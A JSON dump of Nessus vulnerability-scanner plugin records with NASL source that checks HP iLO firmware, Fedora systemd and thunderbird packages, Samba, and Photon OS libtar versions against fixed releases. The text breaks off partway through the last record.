{"nessus": [{"lastseen": "2019-02-15T07:10:21", "bulletinFamily": "scanner", "description": "A denial of service (DoS) vulnerability exists in Integrated Lights-Out\n(iLO) due to an undisclosed vulnerability. \nAn unauthenticated, remote attacker can exploit this issue to cause \nthe application to stop responding.", "modified": "2019-02-14T00:00:00", "published": "2019-02-14T00:00:00", "id": "ILO_HPSSRT_101886.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122190", "title": "iLO 2 < 2.27 / iLO 3 < 1.82 / iLO 4 < 2.10 Denial of Service Vulnerability", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122190);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/14 14:52:48\");\n\n script_cve_id(\"CVE-2015-2106\");\n\n script_name(english:\"iLO 2 < 2.27 / iLO 3 < 1.82 / iLO 4 < 2.10 Denial of Service Vulnerability\");\n script_summary(english:\"Checks version of HP Integrated Lights-Out (iLO).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote HP Integrated Lights-Out (iLO) server's web interface is\naffected by a denial of service vulnerability.\") ;\n script_set_attribute(attribute:\"description\", value:\n\"A denial of service (DoS) vulnerability exists in Integrated Lights-Out\n(iLO) due to an undisclosed vulnerability. \nAn unauthenticated, remote attacker can exploit this issue to cause \nthe application to stop responding.\");\n # https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04582368\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c250bedf\");\n # https://nvd.nist.gov/vuln/detail/CVE-2015-2106\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01654ca1\");\n script_set_attribute(attribute:\"solution\", value:\n \"For iLO 2, upgrade firmware to 2.27 or later. 
For iLO 3, upgrade firmware to 1.82 or later.\nFor iLO 4, upgrade firmware to 2.10 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2106\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:integrated_lights-out_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ilo_detect.nasl\");\n script_require_keys(\"www/ilo\", \"ilo/generation\", \"ilo/firmware\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('http.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\ngeneration = get_kb_item_or_exit('ilo/generation');\nport = get_http_port(default:80, embedded: TRUE);\napp_info = vcf::get_app_info(app:'ilo', port:port, webapp:TRUE);\n\n# Firmware versions are different across generations so additional if check is required.\nif (generation == 2)\n fixed_version = '2.27';\nelse if (generation == 3)\n fixed_version = '1.82';\nelse if (generation == 4)\n fixed_version = '2.10';\nelse\n audit(\n AUDIT_WEB_APP_NOT_AFFECTED,\n 'iLO ' + generation, \n build_url2(qs:app_info.path, port:port),\n app_info.version);\n\nconstraints = [{'fixed_version':fixed_version}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, 
severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-15T07:10:21", "bulletinFamily": "scanner", "description": "An information disclosure vulnerability exists in Integrated \nLights-Out due to an unspecified vulnerability. \nAn unauthenticated, remote attacker can exploit this to \ndisclose potentially sensitive information.", "modified": "2019-02-14T00:00:00", "published": "2019-02-14T00:00:00", "id": "ILO_HPSBHF_02821.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122189", "title": "iLO 3 < 1.50 / iLO 4 < 1.13 Information Disclosure Vulnerability", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122189);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/14 14:04:59\");\n\n script_cve_id(\"CVE-2012-3271\");\n\n script_bugtraq_id(56597);\n\n script_name(english:\"iLO 3 < 1.50 / iLO 4 < 1.13 Information Disclosure Vulnerability\");\n script_summary(english:\"Checks version of HP Integrated Lights-Out (iLO).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote HP Integrated Lights-Out (iLO) server's web interface is\naffected by an information disclosure vulnerability.\") ;\n script_set_attribute(attribute:\"description\", value:\n\"An information disclosure vulnerability exists in Integrated \nLights-Out due to an unspecified vulnerability. \nAn unauthenticated, remote attacker can exploit this to \ndisclose potentially sensitive information.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03515413&docLocale=en_US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d1b5324\");\n script_set_attribute(attribute:\"solution\", value:\n \"For iLO 3, upgrade firmware to 1.50 or later. 
\n For iLO 4, upgrade firmware to 1.13 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-3271\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:integrated_lights-out_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ilo_detect.nasl\");\n script_require_keys(\"www/ilo\", \"ilo/generation\", \"ilo/firmware\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('http.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\ngeneration = get_kb_item_or_exit('ilo/generation');\nport = get_http_port(default:80, embedded: TRUE);\napp_info = vcf::get_app_info(app:'ilo', port:port, webapp:TRUE);\n\n# Firmware versions are different across generations so additional if check is required.\nif (generation == 3)\n fixed_version = '1.50';\nelse if (generation == 4)\n fixed_version = '1.13';\nelse\n audit(\n AUDIT_WEB_APP_NOT_AFFECTED,\n 'iLO ' + generation, \n build_url2(qs:app_info.path, port:port),\n app_info.version);\n\nconstraints = [{'fixed_version':fixed_version}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-15T07:10:21", "bulletinFamily": "scanner", "description": "According to its version number, the firmware of Integrated Lights-Out\nrunning on the remote web server is iLO 3 prior to 1.65 or iLO 4 \nprior to 1.32. It is, therefore, affected by multiple vulnerabilities:\n - A cross-site scripting (XSS) vulnerability exists due to improper\n validation of user-supplied input before returning it to users. \n An unauthenticated, remote attacker can exploit this, by convincing\n a user to click a specially crafted URL, to execute arbitrary script\n code in a user's browser session (CVE-2013-4842).\n\n - An information disclosure vulnerability exists in Integrated \n Lights-Out (iLO) 3 & 4 due to an undisclosed vulnerability. \n An unauthenticated, remote attacker can exploit this to disclose\n potentially sensitive information (CVE-2013-4843).", "modified": "2019-02-14T00:00:00", "published": "2019-02-14T00:00:00", "id": "ILO_HPSBHF_02939.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122188", "title": "iLO 3 < 1.65 / iLO 4 < 1.32 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122188);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/14 13:48:00\");\n\n script_cve_id(\n \"CVE-2013-4842\",\n \"CVE-2013-4843\"\n );\n\n script_bugtraq_id(\n 63689,\n 63691\n );\n\n script_name(english:\"iLO 3 < 1.65 / iLO 4 < 1.32 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of HP Integrated Lights-Out (iLO).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote HP Integrated Lights-Out (iLO) server's web interface is\naffected by multiple vulnerabilities.\") ;\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the firmware of Integrated Lights-Out\nrunning on the 
remote web server is iLO 3 prior to 1.65 or iLO 4 \nprior to 1.32. It is, therefore, affected by multiple vulnerabilities:\n - A cross-site scripting (XSS) vulnerability exists due to improper\n validation of user-supplied input before returning it to users. \n An unauthenticated, remote attacker can exploit this, by convincing\n a user to click a specially crafted URL, to execute arbitrary script\n code in a user's browser session (CVE-2013-4842).\n\n - An information disclosure vulnerability exists in Integrated \n Lights-Out (iLO) 3 & 4 due to an undisclosed vulnerability. \n An unauthenticated, remote attacker can exploit this to disclose\n potentially sensitive information (CVE-2013-4843).\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03996804&docLocale=en_US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aaf46ad1\");\n script_set_attribute(attribute:\"solution\", value:\n \"For iLO 3, upgrade firmware to 1.65 or later. \n For iLO 4, upgrade firmware to 1.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4842\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:integrated_lights-out_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ilo_detect.nasl\");\n script_require_keys(\"www/ilo\", \"ilo/generation\", \"ilo/firmware\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('http.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\ngeneration = get_kb_item_or_exit('ilo/generation');\nport = get_http_port(default:80, embedded: TRUE);\napp_info = vcf::get_app_info(app:'ilo', port:port, webapp:TRUE);\n\n# Firmware versions are different across generations so additional if check is required.\nif (generation == 3)\n fixed_version = '1.65';\nelse if (generation == 4)\n fixed_version = '1.32';\nelse\n audit(\n AUDIT_WEB_APP_NOT_AFFECTED,\n 'iLO ' + generation, \n build_url2(qs:app_info.path, port:port),\n app_info.version);\n\nconstraints = [{'fixed_version':fixed_version}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-12T03:01:03", "bulletinFamily": "scanner", "description": "- Fix large memory usage by systemd-journald (#1665931)\n\n - Some minor fixes to systemd-nspawn, udevadm,\n documentation and logging\n\nNo need to log out or reboot.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "FEDORA_2019-1FB1547321.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122071", "title": "Fedora 29 : systemd (2019-1fb1547321)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin 
were \n# extracted from Fedora Security Advisory FEDORA-2019-1fb1547321.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122071);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/11 11:26:49\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1fb1547321\");\n\n script_name(english:\"Fedora 29 : systemd (2019-1fb1547321)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix large memory usage by systemd-journald (#1665931)\n\n - Some minor fixes to systemd-nspawn, udevadm,\n documentation and logging\n\nNo need to log out or reboot.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-1fb1547321\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected systemd package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:systemd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"systemd-239-11.git4dc7dce.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"systemd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-12T03:01:03", "bulletinFamily": "scanner", "description": "- Updated to latest version (60.5.0) \n\n- https://www.thunderbird.net/en-US/thunderbird/60.5.0/releasenotes/\n\n - Backported Wayland patches from Firefox 65.0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update 
system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-02-11T00:00:00", "published": "2019-02-11T00:00:00", "id": "FEDORA_2019-526EF126CD.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122072", "title": "Fedora 29 : thunderbird (2019-526ef126cd)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-526ef126cd.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122072);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/11 11:26:49\");\n\n script_xref(name:\"FEDORA\", value:\"2019-526ef126cd\");\n\n script_name(english:\"Fedora 29 : thunderbird (2019-526ef126cd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Updated to latest version (60.5.0) \n\n- https://www.thunderbird.net/en-US/thunderbird/60.5.0/releasenotes/\n\n - Backported Wayland patches from Firefox 65.0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-526ef126cd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"thunderbird-60.5.0-4.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-10T15:00:38", "bulletinFamily": "scanner", "description": "The version of Samba running on the remote host is prior to\n3.4.0. It is, therefore, affected by a remote code execution\nvulnerability in process.c due to a heap-based buffer overflow. 
An \nunauthenticated, remote attacker can exploit this to bypass authentication \nand execute arbitrary commands via Batched / AndX request.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "modified": "2019-02-08T00:00:00", "published": "2019-02-08T00:00:00", "id": "SAMBA_3_4_0.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122058", "title": "Samba < 3.4.0 Remote Code Execution Vulnerability", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122058);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/08 15:02:57\");\n\n script_cve_id(\n \"CVE-2012-0870\"\n );\n script_bugtraq_id(52103);\n\n script_name(english:\"Samba < 3.4.0 Remote Code Execution Vulnerability\");\n script_summary(english:\"Checks the version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Samba running on the remote host is prior to\n3.4.0. It is, therefore, affected by a remote code execution\nvulnerability in process.c due to a heap-based buffer overflow. 
An \nunauthenticated, remote attacker can exploit this to bypass authentication \nand execute arbitrary commands via Batched / AndX request.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-0870.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba version 3.4.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0870\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = vcf::samba::get_app_info();\nvcf::check_granularity(app_info:app, sig_segments:3);\n\nconstraints = \n[\n {\"fixed_version\" : \"3.4.0\"}\n];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-08T12:51:52", "bulletinFamily": "scanner", "description": "An update of the libtar package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2017-0040_LIBTAR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121744", "title": "Photon OS 1.0: Libtar PHSA-2017-0040", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0040. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121744);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2013-4420\");\n\n script_name(english:\"Photon OS 1.0: Libtar PHSA-2017-0040\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the libtar package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-80.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10309\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:libtar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libtar-1.2.20-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libtar-devel-1.2.20-3.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtar\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-08T12:51:57", "bulletinFamily": "scanner", "description": "An update of the libtar package has been released.", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2018-2_0-0029_LIBTAR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=121929", "title": "Photon OS 2.0: Libtar PHSA-2018-2.0-0029", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# 
